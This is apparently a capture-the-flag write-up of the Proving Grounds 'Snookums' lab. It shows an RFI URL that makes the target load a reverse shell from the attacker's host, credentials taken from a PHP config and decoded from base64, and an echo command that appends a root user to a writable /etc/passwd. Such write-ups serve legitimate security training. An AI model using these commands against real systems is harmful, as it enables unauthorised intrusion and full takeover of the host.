# Snookums **Source**: Proving Grounds\ **OS**: Linux\ **Community Rating**: Intermediate ## **Enumeration & Reconnaissance** * Autorecon revealed open ports: * FTP (21) * SSH (22) * **HTTP (80)** * RPC (111) * SMB (139 & 445) * **MySQL (3306 & 33060)** * Usually, I’d check FTP first, especially since anonymous login was allowed, but I dove straight into HTTP (80) and got too involved to notice FTP until later. ## **Service Analysis** * The HTTP server hosted a **Simple PHP Photo Gallery** (v0.8).

Simple PHP Photo Gallery

* A version number at the bottom screamed "vulnerable." Searching for CVEs led me to **EDB-ID 48424** (no CVE assigned), an RFI vulnerability in the `img` parameter: {% code overflow="wrap" fullWidth="true" %} ``` http://192.168.192.58/image.php?img=http://192.168.45.201/shell.php ``` {% endcode %} ## **Gaining Initial Access** * I crafted a PHP reverse shell and hosted it on my machine. Initial attempts with ports 901/9911 failed, likely firewall issues. Switching to ports 80/22 worked, and I landed a shell as **apache**.

Initial Access

* Uploaded `linpeas.sh`, which flagged a PHP config file containing MySQL credentials: **root:MalapropDoffUtilize1337**.

Database Credentials

{% code overflow="wrap" fullWidth="true" %} ```bash mysql -u root -p ``` {% endcode %} * Found the **SimplePHPGal** database. That had a users table with 3 users alongside their encoded passwords, I picked the user **michael** since it was the one that's in the home directory.

Users Passwords

{% code overflow="wrap" fullWidth="true" %} ```bash echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -d ``` {% endcode %} * Decoding it gave **HockSydneyCertify123**.

HockSydneyCertify123

## **Privilege Escalation** * I then switched to **michael and r**e-ran `linpeas.sh`, which revealed **writable /etc/passwd**.

/etc/passwd

* It means we can add a new user as root. I generated a password hash for "pwned": {% code overflow="wrap" fullWidth="true" %} ```bash openssl passwd pwned ``` {% endcode %}

openssl passwd

* Appended a new root user, kingkong, to `/etc/passwd` using `echo`: {% code overflow="wrap" fullWidth="true" %} ```bash echo "kingkong:\$1\$xr7pWWIR\$vNF8Z7sc8mgBu6u7ZETyT/:0:0:root:/root:/bin/bash" >> /etc/passwd ``` {% endcode %} * Switching to **kingkong** granted root access.

Root Access

## **Lessons Learned** * **FTP Blindness:** Skipping FTP might cost time, check obvious services first. * **RFI Port Woes:** Firewalls hate fancy ports, stick to 80/443 for shells. * **Double Encoding:** Always decode twice… or thrice. * **/etc/passwd Write Abuse:** If writable, plant a root user and call it a day.